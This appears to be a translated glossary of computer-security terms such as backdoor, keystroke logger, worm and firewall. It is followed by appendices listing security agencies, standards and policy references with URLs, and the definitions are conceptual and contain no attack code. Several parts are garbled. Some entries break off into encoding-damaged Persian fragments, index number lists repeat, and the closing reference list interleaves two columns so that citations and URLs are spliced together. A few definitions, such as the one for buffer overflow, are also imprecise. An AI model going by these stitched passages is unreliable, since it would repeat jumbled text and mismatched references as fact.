An encryption standard that was built by IBM and then reviewed by the National Bureau of Standards and adopted in 1977. The DES standard, which has been in use in both the government and private sectors for the past 20 years, has proven itself well.
Wiretapping
An attack in which data and other information on a line of a communication system is intercepted in transit. The term was originally used for a mechanical connection to an electrical conductor, but it now refers to reading information from any medium that is used for communication (even accessing information directly through a node, gateway, or switch).
Least privilege
Designing a system in such a way that it operates with the minimum access privileges. This design reduces the level of authorization granted for carrying out various activities, and lowers the likelihood that the actions of a user with high access rights will lead to unauthorized activity and consequently to a security breach.
Valid signature
A signature, especially a digital signature, that can be trusted because it can be identified and verified.
Information about the definitions and the functional and performance requirements of 802.11 can be found in the following document:
http://grouper.ieee.org/groups/802/11/Documents/DocumentArchives/1992-docs/1192091.DOC
Perimeter-based security
A technique for protecting a network by controlling access to all of its entry and exit points.
Internet
A collection of different, interconnected networks that has been created by various commercial and governmental bodies. The roots of the Internet go back to early 1969, when ARPANET took shape. ARPA is the acronym of the Advanced Research Projects Agency, which was part of the United States Department of Defense. One of the goals of ARPANET was research on distributed computer systems for military purposes. Its first configuration consisted of 4 computers and was designed to show that a network could be built using computers dispersed over a wide area. The spread of open networks in the late 1980s required a new model of communication. Integrating different types of systems in mixed environments required a better translator between operating systems and a non-proprietary approach to building networks. The TCP/IP protocol (Transmission Control Protocol/Internet Protocol) offered the best solution for this purpose at the time.
Logic bomb
A program that is inserted into software by an attacker. A logic bomb lies dormant until it encounters a predefined condition, and then carries out an unauthorized action.
E-mail bomb
A program that, when run, sends a large number of messages to a given address in order to fill the disk or to bring down the e-mail or web server.
Log processing
The procedure of summarizing logged events, reviewing the logs that have been made, or searching for key events.
Protocol
Any of the generally agreed-upon methods in computer communications.
Wireless equivalent protocol (WEP)
This protocol was designed for implementation in WLAN networks in order to provide the security properties of wired networks (properties such as confidentiality, access control, and data integrity), but because a security flaw was discovered in it, its use is usually accompanied by other special measures.
E-mail
The computer equivalent of postal letters, which can be sent or received by anyone who is connected to the Internet. From the Internet's point of view, all e-mail messages consist of printable text (ASCII).
Bandwidth
The capacity of a network data connection, which for digital transmission is usually measured in units of a thousand bits per second (kbps).
Authorization
The process of establishing the extent of the legal and legitimate access rights of a user, process, or program, according to what is laid down in the company's security policies. Authorization is usually carried out after the user has been authenticated, after which the user can be granted various levels of access.
Access authorization
A process in which the authorization of users, programs, and workstations for access is checked and confirmed.
Bulletin board
An environment for the exchange of knowledge in which Internet users can write messages, read other users' messages, and exchange programs or files.
Risk analysis
An assessment of the information resources, existing controls, and vulnerabilities of an organization's computer systems. Risk analysis yields an estimate of the monetary value of the damage incurred and identifies the controls needed for improvement.
Two-factor authentication
Two-factor authentication is based on something the user knows (the first factor) plus something the user has in his possession (the second factor). To gain access to a network, the user must satisfy both factors, just as when using an automated teller machine one must have its card and also enter one's personal identification number (PIN). To be authenticated during the challenge-response process, users must have this confidential information.
Snapshot
A copy of various values in a computer's memory (main memory, particular registers, and so on) at a specific time. A snapshot can be used to identify attackers by recording information that is usually erased by the attacker before the attack is completed.
Attack
An attempt to compromise the security of a system; a deliberate attempt to subvert protective services and violate the security policies of a system.
Denial of service
A type of attack that occurs when computers connected to the Internet are bombarded with a very large number of useless messages, so that they spend all of their time and capacity responding to these messages and, as a result, the requests of real users
Threat
Anything that is capable of compromising the integrity and correctness,
ﻣﺤﺮﻣﺎﻧﮕﻲ ،ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ. ﺩﺭﻳﺎﻓﺖ ﭘﺎﺳﺦ ﭘﻴﺪﺍ ﻧﻤﻲﻧﻤﺎﻳﻨﺪ.
٣٩٠
٣٩٦
ﺗﻴﻢ ﻭﺍﻛﻨﺶ ﺑﻪ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ )(CERT ﺗﺴﺨﻴﺮ
ﺍﻳﻦ ﺗﻴﻢ ﺩﺭ ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﺭﻧﻲ ﻣﻠﻮﻥ ٣٩٧ﻭ ﺑﻌﺪ ﺍﺯ ﺣﻤﻠﺔ ﻳـﻚ ﻛـﺮﻡ ﻧﻘﺾ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺷﺮﻛﺖ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬـﺎﺟﻢ ﻛـﻪ
ﺍﻳﻨﺘﺮﻧﺘﻲ ٣٩٨ﺩﺭ ﺳﺎﻝ ۱۹۸۸ﺍﻳﺠﺎﺩ ﺷﺪ. ﻣﻲﺗﻮﺍﻧﺪ ﻣﻨﺠﺮ ﺑﻪ ﺗﻐﻴﻴﺮ ،ﺗﺨﺮﻳﺐ ،ﻭ ﻳﺎ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺷﻮﺩ.
٣٩١
٣٩٩
ﺛﺒﺖ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ
ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﻭﻗﺎﻳﻌﻲ ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺭﻭﻱ ﺩﻳـﻮﺍﺭﺓ ﻓﺮﺁﻳﻨﺪ ﺍﺣﺮﺍﺯ ﺣﻖ ﻗﺎﻧﻮﻧﻲ ﻭ ﻣﺸﺮﻭﻉ ﺑﺮﺍﻱ ﻳﻚ ﺳﺮﻭﻳﺲ ﻳﺎ ﻛﺎﺭﺑﺮ
ﺁﺗﺶ ﻳﺎ ﺷﺒﻜﻪ ﻭﺍﻗﻊ ﻣﻲﺷﻮﻧﺪ. ﻲ ﺁﻥ ﺑﻪ ﺍﻃﻼﻋﺎﺗﻲ ﻛـﻪ ﺩﺭﺧﻮﺍﺳـﺖ ﻛـﺮﺩﻩ ﭘﻴﺶ ﺍﺯ ﺣﻖ ﺩﺳﺘﺮﺳ ﹺ
ﺍﺳﺖ .ﻃﻲ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ،ﻛﺎﺭﺑﺮ ﻳﻚ ﻧﺎﻡ ﻳﺎ ﺷـﻤﺎﺭﺓ ﺣـﺴﺎﺏ )ﺑـﺮﺍﻱ
ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﻣﻌﺮﻓﻲ ﻫﻮﻳﺖ( ﻭ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ )ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﻧـﺸﺎﻥ ﺑـﺮﺍﻱ
Part Six
Keystroke Logger [400]
A program that stores everything typed on the keyboard. This information can be written to disk or sent to someone over the Internet. If a keystroke logger is installed on a computer, everything entered into it, including user names and passwords, is recorded; it is just as if someone were watching the keyboard over your shoulder while you use the computer.

Computer Crime [401]
Any illegal activity involving electronic information and computer equipment.

Privacy [402]
A company's protection of data against disclosure by unauthorized parties. Security measures such as encryption can provide a level of assurance that confidential private information is protected against disclosure.

Data-Driven Attack [403]
A form of attack that is encoded as seemingly harmless data and is carried out by a user or a piece of software. Data-driven attacks are a serious problem even for protected systems, because they can reach firewalls in the form of data and launch attacks against the systems behind the firewalls.

Insider Attack [404]
An attack that originates from inside a protected network.

Backdoor [405]
A way of bypassing the normal login procedure and taking control of a computer without needing its owner's consent. If a backdoor is installed on a network-connected computer, someone may be able to use the Internet to take control of that computer without your approval or knowledge. A backdoor is not always malicious; for example, operating systems sometimes contain special user accounts so that support technicians can provide support services remotely. These accounts, however, can also be used for intrusion by unauthorized people. A backdoor is also known as a "trap door".

Availability [406]
The percentage of time that a system can be used for its various activities.

Gateway [407]
A communication bridge between two networks.

Access [408]
Where it is possible to reach a computer, the ability to enter the security perimeter and to read, write, modify, or use any of the resources of the computer system is called access.

Remote Access [409]
Control of a remote computing device over communication lines such as ordinary telephone lines or wide area networks.

Defense in Depth [410]
A security approach in which each system on the network is itself secured to the greatest extent possible.

Firewall [411]
A protective system that controls the flow of traffic entering networks and sometimes between them. Firewalls come in various configurations and uses: filters, application relays, encryption, creation of a demilitarized zone (DMZ), and the like. Firewalls exist in two forms: a firewall may be a software program that runs on a computer, or it may be a separate piece of hardware that monitors what is sent and received over the network. Firewalls can keep the communications between you and the outside world under their control, or block unexpected or unauthorized transfers.

Network-Level Firewall [412]
A firewall in which traffic is examined at the level of network protocol packets.

Password Cracker [413]
A software program containing complete dictionaries that tries to discover users' passwords.

Password [414]
A secret code assigned to each user (or, perhaps better, to each user name) and known to the system. Knowing the user ID and password usually leads to authentication and authorization for access to system resources.

Encryption [415]
The process of hiding the contents of files and programs by changing one string of characters into another using an algorithm (such as DES). Encryption is a way of concealing information so that it cannot easily be read except by the intended recipients. In the simplest form of encryption there is a "key" that is used to conceal the information. Encrypted information can be read only after it has been decrypted, and decryption requires knowing the correct key.

End-to-End Encryption [416]
Encryption at the point where the message originates in the network, followed by decryption at the destination.

Decrypt [417]
Converting ciphertext back to the original plaintext using an algorithm for reciprocal encryption and decryption.

Cryptography [418]
A branch of mathematics concerned with transforming information in order to hide its meaning, prevent its undetected alteration, and prevent its unauthorized use. If the transformation is reversible, cryptography also covers converting the encrypted information back to its original form.

Security Procedures [419]
A set of detailed instructions, configurations, and recommendations for implementing a company's security policies.

Incident Response Procedures [420]
Formal written procedures describing the steps to take when a serious security incident, such as a break-in, occurs. Preparing detailed response procedures before an incident happens is a hallmark of a well-designed security system.

Buffer Overflow [421]
A software flaw that occurs when a program moves data into a space in memory but that part of memory does not have enough room to hold the data. The program may delete characters to make room for the new data. This can cause all sorts of problems and usually leads to events that compromise the security of the program. A simple check that enough memory is available, made before any data is moved into memory, prevents a buffer overflow.

Identity Theft [422]
Occurs when someone has collected enough information about you to be able to pass themselves off as you to organizations such as banks, stores, or the government.

412 Network-Level Firewall
413 Password Cracker
414 Password
415 Encryption
416 End-to-End Encryption
417 Decrypt
418 Cryptography
419 Security Procedures
420 Incident Response Procedures
421 Buffer Overflow
422 Identity Theft

Server [423]
In general, the computer that controls a local area network and governs software access to workstations, printers, and other parts of the network.

Client [424]
In general, the computer or computers that send a request to a server for a service, to which the server gives the appropriate response.

Audit Trail [425]
A documented record of events that enables the security administrator to reconstruct past system activity (on paper or on disk). In computer security systems, the time users log in, how long they spend on various activities, what they do, and whether any deliberate violation of security policy has occurred are recorded in chronological order.

Global System for Mobile Communications (GSM) [426]
An open, non-proprietary system that is constantly evolving. GSM satellite roaming has made the service available in areas where terrestrial coverage is not possible.

Operating System (OS) [427]
System software that controls a computer and its peripherals. Newer operating systems such as Unix, Linux, and Windows XP also perform many of the computer's basic functions.

Global Positioning System (GPS) [428]
Used mainly for navigation. This satellite system pinpoints the exact location of its subscribers on Earth.

Intrusion Detection System (IDS) [429]
A system dedicated to detecting break-ins or attempted break-ins, which works by using analysis software that operates on logs or other network information.

Policy [430]
Organization-level rules governing reasonable use of computing resources, security practices, and operational procedures.

Extranet [431]
An extension of the local network through remote or Internet access so that it also includes partners outside the organization, such as regular suppliers and buyers. Such relationships should take place over authenticated connections to authorized parts of the local network, and are sometimes also encrypted to preserve privacy.

Virtual Private Network (VPN) [432]
A private connection between two machines that carries private traffic over the Internet. VPN technology enables an organization to deliver its network services confidentially over the Internet to remote users, branch offices, and partner companies.

Local Area Network (LAN) [433]
An interconnected system of computers and peripherals. LAN users share each other's information and the capabilities of peripheral devices; for example, they can share the printers attached to the network.
Wireless Local Area Network (WLAN)
A wireless network used to connect laptop computers or other mobile devices to networks.

Personal Identification Number (PIN) [434]
A string of digits or letters used to authenticate a user to a system or service. A PIN is similar to a password but generally relates to financial transactions (bank accounts or credit cards) or to physical access to a location.

Identification [435]
Recognizing the users of a system by means of unique user names.

User Identification [436]
The process by which a user presents himself or herself to the system as a valid user. User identification is not the same as authentication, in which it is established that the user is who he or she claims to be and is entitled to use the system.

User ID [437]
A unique string of characters that identifies each user to the system.

Password Sniffing [438]
Covert eavesdropping, usually on a local network, in order to learn passwords.

Contingency Plan [439]
A security plan for ensuring that important computing resources remain available to the organization in the event of a disaster (such as an earthquake or flood). The plan covers emergency response, backup operations, and post-disaster recovery operations.

Attachment [440]
An attachment is a technique by which text and images can be sent by e-mail. Any non-text file (a program, an image, or a video) is converted into a printable form, encoded, and placed in the body of the message. Everything stored on a computer consists of zeros and ones. In the simplest case, encoding turns these zeros and ones into plain-text characters.

Compression
A method for storing or transferring large volumes of text, images, and programs. Even entire archives may be compressed; in fact, doing so is standard practice when making backups. Examples of compressed archives are "zip" and "tar" files, which can hold a large amount of miscellaneous information in a dense, compact format. These files must be taken out of their compressed format before use. Several vendors and a number of free programs exist for compression.

Reliability [441]
The probability that a system will perform its function fully over a given period of time and under the expected conditions.

Scalability [442]
The ability to expand a computing solution so that it can be used by a larger group of users with minimal impact on performance.

Cracker [443]
Someone who tries to compromise the security of a system and gain access to it without authorization. (See the definition of Hacker.)
User [444]
Any person who interacts directly with a computer system.

Smart Card [445]
A device resembling a credit card, with a microelectronic circuit for storing information about a person. It is not a key or token of the kind used in the authentication process for remote access.

Decode [446]
Converting encoded text back to the original plain text using a reciprocal encoding and decoding method.

Worm [447]
A computer program that can run independently, replicate a complete copy of itself onto other hosts on the network, consume computing resources destructively, and ultimately cause denial of service on the network or networks.

Network Worm [448]
A script or program that uses a computer network as a means of adversely affecting the integrity, reliability, and availability of a system. A network worm may attack from one system to another by establishing a network connection. Worms are usually standalone programs that do not need to be attached to a host file in order to penetrate networks.

Computer Fraud [449]
A computer offence committed by an attacker in order to obtain money, information, or other assets from a company or an individual. Generally, all types of crime fall under this definition. Computer fraud usually involves the modification, destruction, theft, and disclosure of information.

Key [450]
In encryption, a sequence of characters used to convert a file to or from encrypted form. You can enter a key in two ways: as letters and numbers (hexadecimal digits), or in compact form. In the network access security market, "key" often refers to a "token" or authentication device: a device used to exchange challenges and responses during the authentication process. Keys may be small hardware devices resembling pocket calculators or credit cards, or they may reside on a personal computer as protected software.

Private Key [451]
The part of a public/private key pair that is kept secret by its owner. The private key is used to decrypt messages that have been encrypted with the corresponding public key. It is also used to create digital signatures: the document to be signed is digested with a hash algorithm, and the digest is then encrypted with the private key. Together, this process constitutes the digital signature.

Public Key [452]
The part of a public/private key pair that is known to everyone. The public key is used to encrypt information intended for one particular recipient only, or to decrypt a digital signature in order to verify the integrity of a message.

Control
A security measure that a company applies to reduce the risk of disclosure of its information.
444 User
445 Smart Card
446 Decode
447 Worm
448 Network Worm
449 Computer Fraud
450 Key
451 Private Key
452 Public Key
Appendices
Access Control [453]
A set of procedures carried out by software, hardware, and administrators to monitor access, identify users requesting access, record login attempts, and grant or revoke access. Security policies and access controls must be consistent with each other so as to prevent unauthorized use of any system resource by outsiders (intruders) or insiders (employees who should not have access).

Spoof [454]
Gaining access to a system by masquerading as an authorized user.

Domain Name Server Spoofing [455]
The situation in which a computer passes itself off as a domain name server, either by corrupting the part of the cache that relates to the name server or by compromising a name server for a valid domain.

Permissions [456]
The authorized operations (read, write, modify, and delete) that a person can perform on an object (for example, a set of files).

Confidentiality [457]
Assurance that sensitive data is held only by particular individuals or groups (inside or outside the organization). The degree of confidentiality of information depends on the level of protection the organization has assigned to it.

Environment
The set of circumstances, conditions, and external factors that affect the development,

Risk [458]
The probability that a particular system vulnerability will be exploited, accidentally or intentionally.

Countermeasure [459]
An action a company takes to reduce the threats to a system. A countermeasure may be the acquisition and use of a hardware device, a software package, or a working procedure.

Audit [460]
The independent gathering of stored records in order to examine them and verify their integrity.

Security Audit [461]
An independent, professional review of security that examines whether the company's security controls comply with existing standards. Based on the results of the review, the auditor can also recommend the necessary changes to security controls, policies, and procedures.

Intruder [462]
An entity that gains, or attempts to gain, access to a system or system resources without authorization.

Social Engineering [463]
An attack based on deceiving the users or administrators of the target organization. Social engineering attacks are typically carried out by telephoning users, with the attacker pretending to be an authorized user of the system.
453 Access Control
454 Spoof
455 Domain Name Server Spoofing
456 Permissions
457 Confidentiality
458 Risk
459 Countermeasure
460 Audit
461 Security Audit
462 Intruder
463 Social Engineering
Fault Tolerant [464]
A design approach that ensures continued system operation when individual faults occur by building redundant components into the system.

Username / Password [465]
A name and a secret code that identify a user to a computer system or website. A traditional, well-established method of authenticating users.

Open-Source Software [466]
Programs whose source code is distributed under terms that allow it to be freely modified and redistributed. Because the source is available, people can see how the program works and can change it. Authors of open-source programs often encourage other programmers to contribute to further development. Open-source software also includes software that is offered free of charge, and many open-source programs, whether sold or free, have capabilities similar to those of proprietary programs and may carry a small cost. Open-source programs are sometimes used within parts of proprietary programs under special agreements. For more information, see www.opensource.org and www.fsf.org.

Backup [467]
The process of copying computer files to other locations on the computer or to storage devices that may be separate from it. Backups allow you to recover your data when the originals are damaged for whatever reason (from accidental deletion of data to physical damage or theft of the computer).

Token [468]
The main element of trust in the user authentication process. Tokens may be small devices such as pocket-sized chips or credit cards.

Virus Signature [469]
The identifying characteristics of a virus, which software security vendors track and combat. The most active software vendors, including McAfee and Norton (particularly their security tools, which include antivirus and firewall) and Microsoft, which works to secure its systems and programs, periodically release security patches for this purpose.

Penetration [470]
Successful, repeatable, unauthorized access to the protected resources of a system.

Point of Contact (POC) [471]
The person or persons to whom users or system administrators must immediately report break-ins or suspicious incidents. The point of contact is the information-systems equivalent of the 911 emergency line.

Log Retention [472]
How long logs will be kept and backed up.

User Interface [473]
The part of an application that users deal with directly. User interfaces can be text-based, as in DOS, or graphical, like the user interfaces in Microsoft Windows.
464 Fault Tolerant
465 Username / Password
466 Open-Source Software
467 Backup
468 Token
469 Virus Signature
470 Penetration
471 Point of Contact
472 Log Retention
473 User Interface
Virus [474]
A piece of code embedded in a computer program. When the program runs, the infected code is activated too. Once a virus is active, it can replicate itself, send messages, destroy data, and degrade system performance.

Spam [475]
Unsolicited, unwanted, irrelevant, or inappropriate e-mail, especially commercial and advertising mail sent in bulk.

Total Cost of Ownership (TCO) [476]
A model that helps IT professionals understand and manage the direct and indirect costs incurred in acquiring, maintaining, and using an application or computer system. TCO usually includes the costs of training and upgrades as well as the original purchase price.

Data Integrity [477]
Assurance that an organization's data has not been subjected to accidental or deliberate (malicious) modification or destruction.

802.11
802.11 is a family of evolving standards from the Institute of Electrical and Electronics Engineers (IEEE) [478] for wireless local area networks (WLANs) [479]. IEEE is an organization that develops standards in various areas of electrical and electronic engineering, and its standards usually go on to become national and international standards. It publishes a number of journals, has many local chapters in different parts of the world, and has many large societies in specialized fields. For information about IEEE and its Computer Society, see the following sites:
http://standard.ieee.org
http://www.computer.org

Cookie
A file that is written to, or read from, your computer's hard disk at the request of a remote website. The website asks for the file to be written and reads its contents again on later visits. For example, if you give a website your user name, it can ask for that information to be written to your disk. When you return to the site, it reads the cookie from your computer's disk and learns what your user name was. Cookies are used to build a record of web browsing habits and in some cases may violate users' privacy.

IETF [480]
An open community that develops standards and addresses the day-to-day concerns of the Internet.

Hack
In general it means writing a computer program; in security texts, however, it is usually used for exploiting system vulnerabilities to gain unauthorized access to system resources.

Hacker
A person who is interested in computers and enjoys experimenting with them. The term is also applied to someone who, with malicious intent, gathers information about computer security flaws and enters a system without its owner's permission. The word "cracker" is more appropriate for this purely negative sense. (See the entry for Cracker.)

Salami Slice
A computer theft technique for obtaining funds. A database of bank accounts is compromised, a tiny amount is then deducted from each account so that nothing looks suspicious, and all the deducted amounts are deposited into one particular account.

URL [482]
A general address for locating something on the Internet. For example:
http://www.infodev.org
mailto:infodev@worldbank.org
483 Digital Opportunity Task Force
484 Louder Voices Study
485 Organization for Economic Cooperation and Development
… of the United States. The first priority of this new organization is protecting the nation against terrorist attacks. Its component agencies analyze threats and intelligence activities, defend the borders and airports of the United States, protect the critical infrastructure of the United States, and codify the country's responses for future emergencies. By establishing various offices, DHS is also responsible for protecting the civil rights of American citizens and for improving public services such as relief during natural disasters and the provision of citizenship services. For more information, see the organization's website at www.dhs.gov.

The FBI has recently published the results of a survey on computer crime. For the main site of the Computer Security Institute, go to www.gocsi.com; for the survey results, go to the following address:
http://i.cmpnet.com/gocsi/db_area/pdfs/fbi/FBI2003.pdf

The International Chamber of Commerce (ICC) [494] is an international organization whose members also include developing countries. It carries out research in areas related to information and communication technology, such as e-commerce, electronic security, privacy, and the law of the Internet environment. The ICC website and the pages related to this topic can be found at:
http://www.iccwbo.org/home/menu_electronic_business.asp

The following are examples of recent ICC activities:

a) The Electronic Signatures Regulation [495], the result of a review of and response to the European Commission's request concerning the electronic signature directives, which was submitted to the European Commission in September 2003.

… and proposes best practices for protecting privacy in a way that lets business operate effectively and continue to innovate.

c) The ICC policy statement on employee privacy, data protection, and human resources: this statement clarifies the ICC's position on the key issues of data protection and human resources and offers recommendations for government policy in this area.

d) Electronic Terms [496]: the Electronic Terms 2004 are a legal instrument relating to its own rules for electronic contracts. The document was prepared by an informal drafting group. In their current form, the terms are tools that focus on three aspects: 1) information relating to the contract; 2) confidentiality considerations; and 3) the actual value of electronic data items. The terms are limited to issues that arise in the field of electronic media, and so they must be read together with an interpretation of the existing and customary rules of contracts.

FISCAM [497] makes its policies and technical information available at the following website:
http://www.gao.gov/special.pubs/ai12.19.6.pdf

The International Organization for Standardization (ISO) develops global standards in the field of information technology. Its set of best practices in information security management (ISO/IEC17799) completed the British Standards Institution's standard (BS 7799), has been accepted in many countries as an international standard, and is expected to become a reference document for preparing best practices for ensuring secure and trustworthy e-commerce. For more information, see the following website:
http://www.iso.org

These standards, drawn from best practices in security solutions around the world, address various aspects of security, including: security policy, security organization, asset classification and control, personnel security, physical and environmental security, communications and operations security, access control, system development and maintenance, risk management, and business continuity management.

The most recent revision of these standards took place in 2003, and it has been announced that the next revision will take place in September 2005.

Further material on Parts Three and Four, which focus on international business issues and laws:

1) Preparing for the establishment of e-government:
http://ww.audit.nsw.gov.au/guides-bp/e-govt-BPG.pdf
This website offers the best and simplest checklist for governments that want to implement e-government (20 pages). Noteworthy content: chapters on privacy, security, and information and technology management (Audit Office of New South Wales, Australia [498]).

2) Case studies on protecting critical infrastructure through network security can be found at the following website:
http://www.itu.int/osg/spu/ni/security/index.html

3) A very good example of government objectives for drawing up a plan on information and communication technology security:
The government's guidelines for the development of the information society, Minister for Innovation and Technologies, Rome, June 2002.
On this subject you can also refer to the following website, which contains the executive summary of Italy's national plan on information and communication technology security:
http://www.innorazione.gov.it/eng/documenti/linee-guida-eng.pdf

4) References to models, topics, and themes of global information and communication technology policy, including security and privacy, can be found at the following website:
http://www.markle.org/globalpolicy
This body emphasizes effective, practical participation, is made up of interested parties from developing countries, and forms a working team on participation in local policies within the government task force (June 2002).

5) The ITU website contains a collection of links to policy and regulatory websites:
http://www.itu.int/osg/spu/ni/security/links/policy.html
A website for development and e-strategy [499]:
http://www.itu.int/ITU-D/e-strategy/internet/
The World e-Trust [500] Memorandum of Understanding:
http://www.itu.int/ITU-D/e-strategy/MoU/world_e.html
And on e-commerce: technology strategy for
498 Audit Office of New-South Wales, Australia
499 E-Strategy
500 E-Trust
Claessens Stijn, Glaessner Thomas and Klingebiel Daniela, E-Finance in Emerging Markets: Is Leapfrogging Possible?

Commission of the European Communities: Network and Information Security: Proposal for A European Policy Approach – Brussels, June 6, 2001.

Commission of the European Communities: Creating a Safer Information Society by Improving the Security of Information Infrastructures and Combating Computer-related Crime – eEurope 2002, Brussels, January 26, 2001.

Goodman E., Seymour, Hassebroek B., Pamela, King, Davis and Ozment, Andy, International Coordination to Increase the Security of Critical Network Infrastructures, May 20-22, 2002, Seoul.

Harrop, Mike, Creating Trust in Critical Network Infrastructures – Canadian Case Study, May 20-22, 2002, Seoul, Korea.

International Telecommunications Union – Telecommunications Standardization Sector (ITU-T) – Lead Study Group 17 on Communications and Systems Security (www.itu.int/ITU-T/).

Implementation of the eEurope 2005 Action Plan, February 18, 2003.

OECD Guidelines for the Security of Information Systems and Networks – Towards a Culture of Security.

Privacy Amendment Act of Australia (Private Sector) - Act 2000

Security of Internet Enabled Wireless Devices, Wireless Task Force Findings, National Security Telecommunications Advisory Committee, January 2003.

Ways of obtaining anti-spam laws and of contacting the relevant organizations around the world, as well as articles published in law journals that analyze the issues in greater depth, can be found at the following address:
http://www.spamlaws.com/

WIPO has published a summary of intellectual property law in its member countries, which is available at the following address:
http://www.wipo.org/about-ip/en/ipworldwide/index.html.

Main source for the footnotes of Part Four:
http://www.usdoj.gov/04foia/privstat.htm

… address critical infrastructure protection issues, help with issuing warnings about and responding to attacks, and facilitate communication between government and the private sector for infrastructure protection.

At NISCC there is a computer emergency response team called UNIRAS. An Electronic Attack Response Group (EARG) [501] has also been set up within NISCC to help the critical infrastructure of government organizations when it comes under attack. UNIRAS provides warning and awareness information to all sectors of business operating in Britain. The NISCC website (http://www.niscc.gov.uk) also has detailed information on the British government's strategy.

Under Australian law, executive agencies are non-governmental bodies established by the government's representative. They are usually agencies whose functions need to be government-wide in scope while at the same time needing to be independent of the central government. The head of such an agency is appointed by a minister and is also accountable to that minister (in this case, the Ministry of Communications and Information Technology). For more information, see the following address:
http://www.noie.gov.au/projects/confidence/protecting/nat_agenda.htm.

International Critical Information Infrastructure Protection Handbook, edited by Andreas Wenger, Jan Metzger and Myriam Dunn, Center for Security Studies and Conflict Research, Swiss Federal Institute of Technology (2002) http://www.isn.ethz.ch/crn

To find out how other countries have approached protecting their critical information infrastructure, you can refer to the following source:
International Critical Information Infrastructure Protection Handbook, edited by Andreas Wenger, Jan Metzger and Myriam Dunn, Center for Security

U.S. Presidential Decision Directive 62: http://www.fas.org/irp/offdocs/pdd-62.htm

E.O. 13228, Establishing the Office of Homeland Security and the Homeland Security Council, October 8, 2001, http://fas.org/irp/offdocs/eo/eo-13228.htm;

E.O.13231, Critical Infrastructure Protection in the Information Age, October 16, 2001: http://www.ciao.gov/News/EOonCriticalInfrastrutureProtection101601.html

The National Strategy to Secure Cyberspace, Feb. 14, 2003, http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf.

The National Strategy to Secure Cyberspace; by The National Strategy for the Physical Protection of Critical Infrastructures and Key Assets, released March 4, 2003, http://www.dhs.gov/interweb/assetlibrary/Physical_Strategy.pdf

Implementing components of The National Strategy for Homeland Security, issued by the White House; July 16, 2002.

European Commission, Proposal for a Regulation of the European Parliament and of the Council Establishing the European Network and Information Security Agency, Feb.11, 2003, COM (2003) 63 final, 2003/0032 (COD): http://europa.eu.int/information_society/eeurope/action_plan/safe/documents/nisa_en.pdf

Council resolution of 28 Jan. 2002; European Commission, Communication from the Commission to the Council, the European Parliament, the European Economic And Social Committee and the
Committee of the Regions - Network and Studiesand Conflict Research, Swiss
Information Security: Proposal for a Federal Institute of Technology (2002):
European Policy Approach, June 6, 2001, http://www.isn.ethz.ch/crn
COM(2001) 298 final,
http://europa.eu.int/information_society/eeurop U.S. Presidential Decision Directive 63:
e/news_library/new_documents/index_en.htm Critical Infrastructure Protection, May 22,
1998;
European Commission, Communication http://www.fas.org/irp/offdocs/pdd-63.htm
from the Commission to the Council, the
European Parliament, the Economic and
Social Committee and the Committee on the
501 Electronic Attack Response Group
Michael Nugent, It Can’t Happen Here, Wall Regions - Creating a Safer Information
Street Technology Association, Ticker, A Society by Improving the Security of
Technology Magazine For Industry Information Infrastructures and Combating
Profession (2003), Computer-related Crime, Jan. 26, 2001,
http://www.wsta.org/publications/articles/040 COM(20000) 890 final,
2_article03.html http://europa.eu.int/ISPO/eif/InternetPolicies
Site/Crime/CrimeCommEN.html
Carol A. Siegel, Ty R. Sagalow, Paul
Serritella, Cyber Risk Management Homeland Security Act,
Technical and Insurance Controls for http://www.whitehouse.gov/deptofhomeland/
Enterprise-Level Security, Security analysis/
Management Practices, pg. 42,
(September/October 2002). Federal Information Security Management
http://www.gsu.edu/~accrss/Security_and_B Act, Title IIIof E-Government Act of 2002,
usiness_Risk.pdf. Pub. Law 107-347,
http://csrc.nist.gov/policies/FISMA-final.pdf.
ﻃﻴﻒ ﻭﺳـﻴﻌﻲ٥٠٢(CSRC) NIST ﻣﺮﻛﺰ ﻣﻨﺎﺑﻊ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ Thomas J. Smedinghoff, The Developing
،ﺍﺯ ﻣﻄﺎﻟﺐ ﺍﻣﻨﻴﺘﻲ ﺷﺎﻣﻞ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻭ ﻛﺎﺭﺑﺮﺩ ﺁﻧﻬﺎ U.S. Legal Standard for Cyber-security,
Baker & McKenzie, Chicago,
ﻗﺎﺑﻠﻴـﺖ، ﺳﻴﺴﺘﻤﻬﺎﻱ ﮔـﻮﺍﻫﻲ، ﺗﺤﻘﻴﻘﺎﺕ ﺍﻣﻨﻴﺘﻲ،ﺁﺯﻣﻮﻥ ﺍﻣﻨﻴﺖ
http://www.bmck.com/ecommerce/us%20cy
ﺍﻣﻨﻴـﺖ، ﺑﺎﺯﮔﺸﺖ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ،ﺍﻃﻤﻴﻨﺎﻥ ﺳﻴﺴﺘﻢ ber-security%20standards.pdf
ﻭ ﻧﻴﺰ ﺗﺠﺎﺭﺏ ﺍﻣﻨﻴﺘﻲ ﺍﺭﮔﺎﻧﻬﺎﻱ ﻣﻠـﻲ،ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺸﺎﻏﻞ ﻛﻮﭼﻚ
